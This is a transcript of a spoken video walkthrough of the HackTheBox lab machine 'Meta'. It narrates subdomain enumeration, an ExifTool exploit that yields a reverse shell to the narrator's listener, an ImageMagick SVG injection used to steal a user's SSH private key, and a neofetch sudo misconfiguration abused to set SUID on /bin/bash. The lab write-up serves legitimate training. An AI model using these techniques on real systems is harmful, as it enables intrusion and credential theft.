Well, hello everyone, this is Mohammad Badruddin. Hope you all are doing well. So today I'm going to solve another machine from Hackthebox. The machine name is Meta and the difficulty level of this machine is medium. This is pretty straightforward machine. You just need to knock the right door and you will good to go. So without wasting time, I already ran the nmap scan and I want to show you the scan result. So cat default.nmap, and as you can see here, there are two ports open. The port number 22 TCP, the state of this port is open and the service running on it is SSH. The version of it is SSH Open SSH 7.9p1, and port number 80, this is also TCP port, default for HTTP, and this port is also open and the server running over it is Apache HTTPD. But the most important part here, that HTTP title did not follow redirect to HTTP artcorp.htb. That means this is the domain. So now I created a record in etc host file, and if I come here, you can see I can access this website with artcorp.htb, and now this website is open. So after seeing this, I go to the page source to see if there is anything interesting, but there is nothing. It's normal that you found CSS and JS folders, image folders, so that's it. Also asset. So there is nothing important here. So I go to the directory enumeration, and simultaneously I will also go for the subdomain enumeration. So I'm going to use GoBuster dir for directory enumeration space -z. Don't wanna see the progress space -w, that is for word list. So user share word list, and inside seclist there is discovery, web contents, and raft medium and directories dot text. Then I want to specify the URL. So space -u http:// artcorp.htb / and number of threads I want to use is 40, and just hit enter. Here in the second tab, I am going to fuzz for the subdomains. So, and for that I'm going to use fuff tool. Fine. So there is nothing interesting. I'm going to close this. Okay, clear. And I'm going to use the same tab, same terminal. So fuff space -w for the word list, user share word list seclist. Inside seclist there is discovery DNS, and inside the DNS there is a file which is subdirectory subdomains top 1 million dot text, and space -u to specify the URL, which is going to be http:// artcorp.htb. Fine. And then space -h. Here I will specify host : I want to fuzz for the subdomain, so fuzz.artcorp.htb. Fine. Now number of threads I wanna use 40, and I only wanna see the results with response code 200, and hit enter. As I hit enter, it's gonna show us the result, hopefully. And as you can see here, we found a valid subdomain, which is dev01. Fine. So I'm going to close this, clear, and I already created a record in etc host file for the new subdomain, which is dev01 artcorp.hackthebox. So let's try to access that. dev01.artcorp.htb, hit enter, and here we have a link which is MetaView. So click on it, and we found MetaView. Here we need to upload a file, and as you can see, upload your image to display related metadata. That means whatever image file we are going to upload here, that will show us the metadata. So let's try to meta this one, and image.png upload, and as you can see here, it shows the metadata. If you see the result closely, this output closely, you will find that this output is similar to EXIF tool. If I show you here, EXIF tool and image.png, hit enter, and same result. Come back, same result. Fine. There are few things not there, like few fields are not there, like file permission and all, but it is the EXIF tool result. Fine. So that means it could be a EXIF tool vulnerability there. So let's see, search exploit, EXIF tool, hit enter. There is no result, but let's go Google. Let's go on Google, hit enter, and EXIF tool exploit, and this is the exploit. So exploit.py, this is the Python script, and the prerequisite is your attack machine must have EXIF tools installed, and this. So I already installed that apt. If you don't have that, you can install it from here like this. Hit enter, and as you can see, the newest version is already installed. So we don't need it to install. You can install it if you don't have that module. So this is pretty straightforward. I just want to see the exploit.py. So here we need to change the IP address, and the payload, it's actually going to put a payload. MIME type is base64, then it will add eval function, decode base64, and this is the payload. And then it is going to execute it with subprocess.run payload.bzz. So let's go, and we will clone this repo. I actually already cloned this repo on my attack box, so I'm going to just execute it. Python 3, first of all, I need to go CVE clear, and let's say Python 3, then exploit.py, and just hit enter. And as you can see, there is one image.jpg file created, also payload.bzz and exploit.djvu file is there. Fine. So now what we need to do is we need to upload that image.jpg file, which is newly created here, and then we will simultaneously start the netcat listener. So cd ... and nc space hyphen nlvp, port number 9090, hit enter. Now we need to come here and just browse it again and go inside this directory and image.jpg. Upload this file, and as we upload, it's going to take a lot. That means we get a shell here. Okay, who am I? So I'm ww data id. Fine, very well. So let's see which Python 3. So there is Python 3 clear will not execute. Python 3 space hyphen c, then import pty colon pty dot spawn here /bin/bash. Okay, now to execute the clear command, we need to export term is equal to xterm. Now we can execute clear command. That's it. So ls space hyphen -l and all these files are there. We are inside dev01.artcorp.htb inside the meta view directory. How many users are there? Those can run bin bash. So grep bash /etc/passwd, and there are two users. One is root and another one is Thomas. Fine, let's try to find what's inside Thomas home directory, and we can access that or not. So we can go inside the Thomas directory. There is user flag. Let's try to read it, but as you can see here from the permissions, we cannot read that user.text, and yeah, we cannot read it. So now we can do a few more things. Let's try netstate space hyphen tlpn, but not interesting because these ports we already found in the nmap scan. Fine. So uname space hyphen e, uname space hyphen a. This is the version of the Linux installed on the target machine. ps space hyphen ps space aux, and oh, it's not showing completely. So for this, there is command you can use, ps space aux ww, and now as you can see, it's showing complete path and complete things. So what it's executing, what are the process running, okay, nothing interesting here. Let's try to see if there is any cron job running. So clear cat /etc/cron tab, hit enter, and there is nothing in cron tab 2. So before we try to find out the processes running on the target machine, but these all the processes are fixed processes. Fine, but there is another kind of processes as scheduled job. So in cron tab, it's not showing us any cron job, but maybe we will find that real-time processes on the target machine with pspy. So if I come here cd/opt, so let's start the Python HTTP server. So Python 3 space -m http.server on port number 80, hit enter, it's started, clear, and I'm going to cd inside dev shm. Here I'm going to execute wget command to actually download that pspy. This is my IP and it's published on port number 80, and I wanna download pspy 64. So as you can see, the pspy 64 is downloading on the target machine. So we will wait a moment. Okay, it's downloaded. Clear chmod +x pspy 64, hit enter, and let's execute this pspy. So pspy 64, hit enter, and let's see what we will get here. We don't need this. Clear. And as you can see, we found some hidden processes like this. Fine. And if you see closely, the UID is 1000, which is the unique ID or user ID for the Thomas user, and it's executing. I actually want to copy this, come here and copy that. So you can see it's executing a binary which is Morgify and space hyphen format PNG and this. Then it is executing another binary which is convert underscore images.sh, and then it is going to kill the process for Morgify. What else? Okay, fine. So it's executing it again and again because this is scheduled job, right? So now I don't need this. Clear, and I lose my shell. So nc space hyphen nlvp port 9090, come back here, browse again, and again upload image.jpg, upload, come back here, we got shell. Let's say python 3 space hyphen c for the command, and I'm going to import a module which is pty and pty.spawn, and inside it I'm going to execute bin/bash, and done. Fine. Export term is equal to xterm and clear. So the first thing I want to see what exactly this file do and what are the permissions on that file. So I'm going to copy this, come back here, cd ls space hyphen la, paste that, hit enter. So it is executed. The owner is root, and there is a symlink to magic k. Okay, fine. And another, it's executing also same as Thomas. Thomas is executing this bash script. So copy this, come here, ls space hyphen la, and paste that, hit enter. So okay, it's inside this. So you can see here it's also root. I want to see what's inside this file. Copy, paste here, hit enter. So this is a bash file, and inside that bash file it is going into the directory which is var www.dev01.rcorp.htb. Inside there is a directory convert underscore images, and then it is executing this command. Fine. And then it is going to kill the Morgify process. So this is very interesting, and I'm going to copy this, come back here and paste that. Fine. Now because we know that what actually it's doing, so whatever it's doing with this Morgify file. So we need to find out is there any publicly known exploit for Morgify. So Morgify, there is nothing, because there is a symlink which is magic k, I think, magic k, and there are exploits, but these exploits depends on the version, as you can see here. So we need to first find out what version of magic k is running on the target machine, and for that clear that is executing user local bin mogrify. So I want to execute this, and all these are the switches. So my purpose is to identify which version is running. Verbose view VVV, and there is version. So I need to execute it with -version. Switch to clear, paste space -version to identify the version. And as you can see, this is actually image magic K, and the version is 7.0.10/36. So this is also important. I'm going to keep it with me. Come here, paste that. You can also take the screenshots as you want. Now come back to the search exploit, and as you can see, there is a exploit, but this is for 1 and this is for 7.0.10. So there is a difference. Let's search on the Google image magic K 7.0.10 exploit. Okay. This is 1/0, but we don't need this. We need this one, 7.0.10. So let's go there. Okay. Come back here. CVE 2020-2959 command injection. That seems interesting, and also the version is same. So let's see what we will have here. Vulnerability summary. These are the reference links. So blog. Let's see this blog. So shell injection via PDF password, HTTPS and curl. So as you can see, this is a SVG file, and then it is executing convert command to convert this SVG file into PNG file. And if we come here, it's executing convert_image.sh. Fine. So, and inside convert_image.sh, it is going to this directory, and it is going to convert any file inside this directory with any extension into the PNG format. That's what it's doing. Okay. Entry point encrypted PDF, exploitation MSL and polyglots. SVG MSL polyglot file. We need this one. And as you can see, if you see this closely, you will find that here it's executing the command, right? So I'm going to copy this, copy, and come here, paste that here, and save it as meta. Where is meta? Inside the desktop. This is meta, and I wanna save this as poc.svg. So poc.svg, and if you want to change the file name, you can change the file name, but here you must change here also. Fine. Okay, now what we need to do is we need to upload this file to the target machine. Fine. And we need to wait. And once the scheduled process is completed, we will find this result of id command inside a file which is owned. So okay, we will first test one thing. cd/home/thomas ls space -la. There is .ssh directory, so cd/.ssh cd.ssh permission denied, but it's there. If this directory is there, so there is a probability that that directory contains IDRSA public and private key. So cd/var/www/dev01.artcorp.htb, and inside that there is a folder or directory which is convert_images. Images. Hit enter. Command not found. Why? What I did? Convert images. This is the directory. Copy. CD. Paste that. Yeah, that works. Fine. Now we are inside this directory. We just need to upload that file here, because as you can see, the cron job or scheduled job is running here, which is from this directory. Fine. So come here, cd/desktop meta ls, and this is the file. So I'm going to start the python 3 space -m http.server in port number 80. Come here and wget. Also, one more thing I want to do before executing that. I actually want to change. So let's say I want to save this result inside dev/shm, and I don't need this, so save it. Now come here, http://10.10.14.26. This is my IP, and I wanna upload or download poc.svg file. Hit enter, and it's there. So as you can see, poc.svg is there. Now I need to wait for this cron job to be executed. /dev/shm. Nope. Nope. Up to now it's not done. Or you can take one more reverse shell on another terminal and execute the pspy there, and once you will see that process is executed on the pspy terminal, then you can check it from here. Come on, ls/dev/shm. Nope. Up to now not. Clear. ls space -la, and as you can see, this poc.svg file is deleted automatically. ls/dev/shm. Of course it will not be here because we lost that file. http://10.10.14.26/poc.svg. So you need to attempt 2 or 3 times. /dev/shm. Come on. Yeah, and as you can see, this time we got that file in the dev/shm, whatever we executed, and in that file there must be the result of id command. So cat/dev/shm/0wned. hit enter, and as you can see, because that process is executing as Thomas user, so we will find the result of id command from the Thomas. Fine. Now that means we are successful in command injection attack. Now what we need to do is here we can say cat /home /Thomas /.ssh /id_RSA and save this result in dev shm in a file named as id_RSA. Fine. Now save it, Control S, and come back here, ls space -la, and still POC is there. Clear rm space -rf poc.svg, hit enter, ls space -la, it's deleted from here. Now download that file again with wget. So wget http://10.10.14.26/poc.svg, hit enter, and it's there. Fine. Now again we need to wait for a moment, ls/dev/shm. so once the scheduled job or cron job is executed, we will find a file here named as id_RSA. What POC file is again deleted, so wget http://10.10.14.26/poc.svg svg, hit enter, poc.svg. It did not take the complete command wget, so wget http://10.10.poc.svg, it's downloaded, it's there, ls/dev/shm, still we need to wait. So paste, nope, let's say our file is there or not. Yeah, up to now our file is there. Nope. Clear. Check again whether file is there or not. poc.svg file is still there. ls/dev/shm, and as you can see id_RSA is there now. So cat we will clear it first, cat /dev/shm/id_RSA, and this is the id_RSA file for Thomas user. So we will copy this, Control C, come here, clear a cd desktop, and inside meta nano id_RSA, hit enter and paste that key here. Save it, and chmod 600 id_RSA. Now let's try SSH to Thomas user with this key, id_RSA THOMS Thomas at artcorp.htb. Hit enter. Yes, and we logged in as Thomas. And cat user.txt, So as you can see, we found the first flag. So clear it, and now we will go for the privilege escalation. So the first thing is sudo space -l, hit enter, and as you can see, this Thomas user can execute this binary or executable file with the sudo command as root with no password required. Fine. So we need to find out now. ls space -la, paste, hit enter. Let's try to execute that with sudo. So sudo paste selection, hit enter, and this is the result of that executable neofetch file. Come here. Now I don't need this. Exit search exploit. Come on. Search exploit. Instead of exif tool, I wanna neo fetch, hit enter, and there is no exploit available on search exploit, so I will go on the Google again. Close this, and close this. Come here and neo fetch config user bin neo fetch exploit config exploit. Let's see. Come here. Okay. This is the config file, right? So this is the kernel section, and that give us the this result. Fine. So which distro you are using? Uptime. So as you can see here, we found uptime. So each one have a separate section like memory. GPU, resolution. So you can configure each of these section to show here the information of that. Text color, text option, blog, command line system tool. You can see this blog also. Neofetch config file location. Let's see, where is that file? etc neofetch config. Try to find out this file. ls space -la /etc neofetch. No, there is no neofetch in etc file. What's here? There is .config directory. Let's see, ls space -la .config, and there is neofetch. Very well, clear. So cd .config /neofetch ls space -la, and there is config.conf file. So we need to see what's inside this file, because the configuration what we see here is a default one maybe, and what we have on the target, it is customized config.conf file. So cat and Yeah, auto, center normal, thumbnail directory, and thumbnail directory is xdg cache home and home.cache thumbnail neofetch. Okay, so it's saying the home directory which is inside Thomas home directory. Let's see if we have something else. We can first of all, I want to take this with me. Copy, come here, paste that here. Now clear this. Come on, ls space -la config.conf. So Thomas can write in this file. Okay, let's say nano config.conf. Okay, and all these are the modules like OS, host, kernel, uptime. These are the modules inside this file. If I say here id, save this, and let's try sudo neofetch sudo space -l and sudo user bin neofetch. Didn't work, so obviously it will not work. Let's try print env to see the environment, and as we can see here, the present working directory is this, and xdn session type is tty, home is home/thomas, xdg session equal to user, xdg runtime directory is run user 1000, and this is the path. Fine. And what we found here, cache home. So let's try to find out about this. Copy, paste that, hit enter, and xdg base directory specification. This, it's saying config home, define the base directory relative to which user specific configuration files should be stored. Very well. Config home, right? Come back here. This is a good resource for this. Config home actually defines the base directory relative to which user specific configuration files should be stored. Config_home is either not set or empty. A default equal to /home and .config should be used. Okay, that means if we configure this path, so the user specific configuration files should be inside the path we explained here, right? So let's try, because what is the condition here, that xdg runtime is there, but there is no xdg config home, and that's why once I make any change in this configuration file, it does not take any effect. It is not taking that configuration from that file. I think this. So let's try to set that path, and it is very simple with the export command. Come here, and we will take this xdg config home, paste that, and let's make it equal to /home/Thomas. Hit enter. Not a valid identifier. Why? Because we should not put here this $sign. Hit enter. Clear. Print environment. And now we will see config home, this one. Fine. Now we already made the changes in neofetch file, so in the configuration file. So now if we see config.conf, so you can see there is the change we made is already gone. So clear, we need to make one more time that change. So config.conf, hit enter, come here, let's put here id command and save this, and let's run again sudo user bin neofetch, hit enter. Still didn't work. Let's see what we put here. Export /thomas/.conf or .config file. Hit enter. Sudo neofetch, and as you can see, now our command is executed, because before what we set here, the configuration home path is only home/Thomas, but actually this configuration file exists in .config folder, .config directory. And now as you can see, the command is executing successfully. So now we can execute any command we want. So go back to the nano config.conf file, come here, and what I want to do here is, instead of that, I am going to put set the SUID bit set on the /bin/bash. For this I am going to say change mode u+s on /bin/bash and save this file again. Control X, clear, ls space -la /bin/bash. Now you can see there is no SUID bit set, but once I execute sudo user bin neofetch, hit enter, and ls space -la /bin/bash, and this time you will see, oh no, it's still not set. Why? Nano config, okay, come on, chmod u+s and /bin/bash. Save this again, and execute again, ls space -la bin bash, and yeah, this time as you can see the SUID bit is set on bin bash. So clear this, and now just execute /bin/bash space -p, hit enter, and who am I? Root, id is root, and we can do anything. cd/root, go inside the root directory, ls space -la, and there is root.txt, so root.txt, and this is the root flag. So we compromise that machine completely, and we reach up to the root user. So that's it for this video. If you like the content, please like, subscribe, and share. See you in the next video. Bye.